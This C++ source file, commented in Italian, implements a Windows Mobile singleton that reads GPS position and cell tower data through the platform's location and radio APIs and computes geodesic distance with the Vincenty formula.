#include "GPS.h"

GPS* GPS::_instance = NULL;
BOOL GPS::_bRadioReady = FALSE;
BOOL GPS::_bGpsReady = FALSE;
volatile LONG GPS::lLock = 0;

/************************************************
 * self & Release
 ***********************************************/
GPS* GPS::self(DWORD dwTimeout, DWORD dwMaximumAge)
{
	while (InterlockedExchange((LPLONG)&lLock, 1) != 0)
		Sleep(1);

	if(_instance == NULL) {
		_instance = new(std::nothrow) GPS();
		_instance->Initialize(dwTimeout, dwMaximumAge);
	}

	InterlockedExchange((LPLONG)&lLock, 0);

	return _instance;
}

/************************************************
 * Constructor & Destructor
 * Protected members
 ***********************************************/
GPS::GPS(void)
{
	_iReference = 0;
	_hMutex = INVALID_HANDLE_VALUE;
	_hRil = INVALID_HANDLE_VALUE;
	_hGpsDevice = INVALID_HANDLE_VALUE;
	_hCellEvent = INVALID_HANDLE_VALUE;
	_dwTickCount = 0;
	_dwTimeout = 0;
	_dwLastCell = 0;
	_dwLastGps = 0;
}

void GPS::Stop() {
	WAIT_AND_SIGNAL(this->_hMutex);
	_iReference--;

	if(_iReference > 0)
		return;

	if (this->_hRil != INVALID_HANDLE_VALUE && this->_hRil != NULL) {
		RIL_Deinitialize(_hRil);
		_hRil = INVALID_HANDLE_VALUE;
	}

	if (this->_hGpsDevice != INVALID_HANDLE_VALUE && this->_hGpsDevice != NULL) {
		GPSCloseDevice(_hGpsDevice);
		_hGpsDevice = INVALID_HANDLE_VALUE;
	}

	if (_hCellEvent != INVALID_HANDLE_VALUE) {
		CloseHandle(_hCellEvent);
		_hCellEvent = INVALID_HANDLE_VALUE;
	}
	UNLOCK(this->_hMutex);
}

BOOL GPS::Start() {
	BOOL bRet;

	WAIT_AND_SIGNAL(this->_hMutex);
	_iReference++;

	// Non possiamo fare lo start due volte di seguito
	if(_hGpsDevice != NULL && _hGpsDevice != INVALID_HANDLE_VALUE && _hCellEvent != NULL && _hCellEvent != INVALID_HANDLE_VALUE) {
		UNLOCK(this->_hMutex);
		return TRUE;
	}

	// Entrambi i parametri sono gia' valorizzati al momento della ::self()
	bRet = Initialize(_dwTimeout, _dwMaximumAge);
	UNLOCK(this->_hMutex);
	return bRet;
}

GPS::~GPS() {
	if (this->_hMutex != INVALID_HANDLE_VALUE)
		CloseHandle(_hMutex);

	if (this->_hRil != INVALID_HANDLE_VALUE && this->_hRil != NULL)
		RIL_Deinitialize(_hRil);
	
	if (this->_hGpsDevice != INVALID_HANDLE_VALUE && this->_hGpsDevice != NULL)
		GPSCloseDevice(_hGpsDevice);

	if (_hCellEvent != INVALID_HANDLE_VALUE)
		CloseHandle(_hCellEvent);
}

BOOL GPS::Initialize(DWORD dwTimeout, DWORD dwMaximumAge)
{
	_dwTimeout = dwTimeout;
	_dwMaximumAge = dwMaximumAge;

	if(_hMutex == INVALID_HANDLE_VALUE)
		_hMutex = CreateMutex(NULL, FALSE, NULL);

	if(_hMutex == INVALID_HANDLE_VALUE)
		return FALSE;

	if (_dwTimeout <= 0 || _dwMaximumAge == 0)
		return FALSE;	// Cannot initialize object!

	HRESULT hResult = RIL_Initialize(1, 
		&GPS::_RIL_Callback,
		&GPS::_RIL_Notify, 
		RIL_NCLASS_NETWORK | RIL_NCLASS_RADIOSTATE | 0x08, 
		(DWORD_PTR)this,
		&_hRil);

	_hGpsDevice = GPSOpenDevice(NULL, NULL, NULL, 0);

	if ((hResult & 0x80000000) && // an error occurred
		(_hGpsDevice == NULL)) // GPS Initialization failed
		return FALSE;	// Localization FAILED

	if (_hGpsDevice != NULL)
		GPS::_bGpsReady = TRUE;

	if (_hRil != NULL && hResult == S_OK)
	{
		GPS::_bRadioReady = TRUE;
		_hCellEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
	}
	return TRUE;
}



/************************************************
 * CALLBACK!
 ***********************************************/
void GPS::RIL_Callback(
	DWORD dwCode,           // @parm result code
    HRESULT hrCmdID,        // @parm ID returned by the command that originated this response
    const void* lpData,     // @parm data associated with the notification
    DWORD cbData           // @parm size of the strcuture pointed to lpData
	)
{
	if (hrCmdID == _cellRequestID)
	{
		if (lpData != NULL)
		{	// REQUEST!
			memcpy((void *)&_rilCellTowerInfo, lpData, sizeof(RILCELLTOWERINFO));
			_dwLastCell = GetTickCount();
		}

		SetEvent(_hCellEvent);
	}

	return;
}

void GPS::RIL_Notify(
    DWORD dwCode,           // @parm notification code
    const void* lpData,     // @parm data associated with the notification
    DWORD cbData           // @parm size of the strcuture pointed to lpData
	)
{
	return;
}

void GPS::_RIL_Callback(
    DWORD dwCode,           // @parm result code
    HRESULT hrCmdID,        // @parm ID returned by the command that originated this response
    const void* lpData,     // @parm data associated with the notification
    DWORD cbData,           // @parm size of the strcuture pointed to lpData
    DWORD dwParam           // @parm parameter passed to <f RIL_Initialize>
	)
{
	if (dwParam != 0 && GPS::_instance != NULL)
	{	// can accept message!
		GPS::_instance->RIL_Callback(dwCode, hrCmdID, lpData, cbData);
	}
	return;
}

/// TODO!
void GPS::_RIL_Notify(
    DWORD dwCode,           // @parm notification code
    const void* lpData,     // @parm data associated with the notification
    DWORD cbData,           // @parm size of the strcuture pointed to lpData
    DWORD dwParam           // @parm parameter passed to <f RIL_Initialize>
	)
{
	switch(dwCode)
	{
		case RIL_NOTIFY_RADIOEQUIPMENTSTATECHANGED:
			break;
		//case RIL_NOTIFY_RADIORESET:	// unknown state

			//break;
		case RIL_NOTIFY_RADIOPRESENCECHANGED:
			break;
		default:
			// Unknown state
			break;
	}
	return;
}


BOOL GPS::GpsReady()
{
	return GPS::_bGpsReady;
}

BOOL GPS::RadioReady()
{
	return GPS::_bRadioReady;
}

/**
 *	Request refresh of ?
 **/
BOOL GPS::RefreshData(short mask)
{
	WAIT_AND_SIGNAL(this->_hMutex);

	BOOL bResult = FALSE;

	if (GpsReady() && (mask & 0x01)) {
		GPS_POSITION position;
		
		ZeroMemory(&position, sizeof(GPS_POSITION));

		position.dwVersion = GPS_VERSION_1;
		position.dwSize = sizeof(GPS_POSITION);

		if (GPSGetPosition(_hGpsDevice, &position, _dwMaximumAge, 0) == ERROR_SUCCESS) {
			CopyMemory(&_gpsPosition, &position, sizeof(GPS_POSITION));

			_dwTickCount = GetTickCount();
			bResult = TRUE;
		}
	}

	if (RadioReady() && (mask & 0x02)) {
		// notification callback
		ResetEvent(_hCellEvent);
		HRESULT hResult = RIL_GetCellTowerInfo(_hRil);

		if (hResult > S_OK) {
			_cellRequestID = hResult;
			if (WaitForSingleObject(_hCellEvent, _dwTimeout) == WAIT_OBJECT_0) {
				bResult = TRUE;
			}
		}
	}

	UNLOCK(this->_hMutex);
	return bResult;
}


BOOL GPS::getGPS(GPS_POSITION *_out) {
	if(_hGpsDevice == INVALID_HANDLE_VALUE || _hGpsDevice == NULL)
		return FALSE;

	if (GpsReady()) {
		if (_dwTickCount == 0 || ((GetTickCount() - _dwTickCount) > _dwMaximumAge)) {
			if (RefreshData(0x01)) {
				memcpy((void *)_out, (void *)&_gpsPosition, sizeof(GPS_POSITION));
				return TRUE;
			}
		}
	}
	
	return FALSE;
}

BOOL GPS::getCELL(RILCELLTOWERINFO *_out)
{
	if(_hCellEvent == INVALID_HANDLE_VALUE || _hCellEvent == NULL)
		return FALSE;

	if (RadioReady()) {
		if (_dwTickCount == 0 || ((GetTickCount() - _dwTickCount) > _dwMaximumAge)) {
			if (RefreshData(0x02)) {
				memcpy((void *)_out, &_rilCellTowerInfo, sizeof(RILCELLTOWERINFO));
				return TRUE;
			}
		}
	}

	return FALSE;
}


// 6378137.0f -> semiasse equatoriale dell'ellissoide internazionale WGS-84
// 1/298.257223563 -> schiacciamento dell'ellissoide internazionale WGS-84
// 6356752.3142 -> raggio polare dell'ellissoide internazionale WGS-84
DOUBLE GPS::VincentFormula(DOUBLE lat1, DOUBLE lon1, DOUBLE lat2, DOUBLE lon2) {
	double a = 6378137.0f, b = 6356752.3142,  f = 1/298.257223563;
	double rad = PI / 180.0f, lon_rad = (lon2 - lon1) * rad;
	double U1 = atan((1 - f) * tan(lat1 * rad));
	double U2 = atan((1 - f) * tan(lat2 * rad));
	double sinU1 = sin(U1), cosU1 = cos(U1);
	double sinU2 = sin(U2), cosU2 = cos(U2);
	double cosSqAlpha, cos2SigmaM, sinSigma, cosSigma, sigma, sinAlpha;
	double cosLambda, sinLambda;
	double uSq, A, B, C, deltaSigma, s; 
	double lambda = lon_rad, lambdaP = 2 * PI;
	int iterations = 20;

	try {
		while (fabs(lambda-lambdaP) > 0.000000000001f && --iterations>0) {
			sinLambda = sin(lambda), cosLambda = cos(lambda);

			sinSigma = sqrt((cosU2 * sinLambda) * (cosU2 * sinLambda) + 
				(cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) * (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda));

			if (sinSigma == 0.0f) 
				return 0.0f;  // I punti sono coincidenti

			cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda;
			sigma = atan2(sinSigma, cosSigma);

			sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma;

			cosSqAlpha = 1 - sinAlpha * sinAlpha;
			cos2SigmaM = cosSigma - 2 * sinU1 * sinU2/cosSqAlpha;

			//if (isnan(cos2SigmaM)) cos2SigmaM = 0;

			C = f / 16 * cosSqAlpha * (4 + f * (4 - 3 * cosSqAlpha));

			lambdaP = lambda;
			lambda = lon_rad + (1-C) * f * sinAlpha *
				(sigma + C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM * cos2SigmaM)));
		}

		if (iterations == 0) 
			return 0.0f;  // La formula non e' riuscita a convergere

		uSq = cosSqAlpha * (a * a - b * b) / (b * b);

		A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)));
		B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)));

		deltaSigma = B * sinSigma * (cos2SigmaM + B / 4 * (cosSigma * (-1 + 2 * cos2SigmaM * cos2SigmaM)-
			B / 6* cos2SigmaM * (-3 + 4 * sinSigma * sinSigma) * (-3 + 4 * cos2SigmaM * cos2SigmaM)));

		s = b * A * (sigma - deltaSigma);
		return s;
	}

	catch(...) {
		return 0.0f;
	}
}